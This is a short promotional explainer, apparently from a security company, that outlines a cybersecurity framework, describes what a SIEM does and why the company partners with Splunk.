Cyber Security Framework
Protect
Organizations must develop and implement the appropriate safeguards to limit or contain the impact of a potential cybersecurity event.
Identify
Organizations must develop an understanding of their environment to manage the cybersecurity risk to systems, assets, data and capabilities.
Detect
Organizations must implement the appropriate measures to quickly identify cyber security events
Recover
Organizations must develop and implement effective activities to restore any capabilities or services that were impaired due to a cybersecurity event.
What is a SEIM?
Gartner defines SIEM “as a technology that supports threat detection and security incident response through the real-time collection and
historical analysis of security events from a wide variety of event andcontextual data sources.”
So it’s like radar for cyber security professionals.
Basically in logs everything on your systems and networks to that you can analyze what is going on.
Why Securicom partners with Splunk?
“Splunk Enterprise monitors and analyzes machine data from any source to
deliver Operational Intelligence to optimize your IT, security and business
performance.”
“Machine-generated data is one of the fastest growing and complex areas of
big data. It is also one of the most valuable, containing a definitive record of
all user transactions, customer behavior, machine behavior, security threats,
fraudulent activity and more. Splunk turns machine data into valuable insights
no matter what business you are in. It’s what we call Operational Intelligence.”
The SIEM Buyer’s Guide for 2020 from Splunk
Is SEIM technology new?
Not at all. It has been around for at least 15 years.
The difference is that today we have much more powerful tools to analyze the data that has been collected.
Modern analytics-driven SIEM solutions offer users is a simple way to correlate information across all security-relevant data.
Your organization can anticipate threats and implement measures to limit your vulnerability in real time.
Where does the data come from?
Primarily it is gathered from servers and network device logs like routers, SIEM data also comes from endpoint security, network security devices, applications, cloud services, authentication and authorization systems and online databases of existing vulnerabilities and threats.
What does a SEIM do with the data?
SIEM software then analyses the data to identify unusual behavior, system anomalies and other security indicators of a security incident. The information is used for real-time event notification, compliance audits, reporting, performance dashboards, historical trend analysis and post incident forensics.
So what is a SEIM good for?
A SEIM allows you to automate your cyber security in these areas:
• Real-time monitoring
• Incident response
• User monitoring
• Threat intelligence
• Advanced analytics
• Advanced threat detection
• Use case library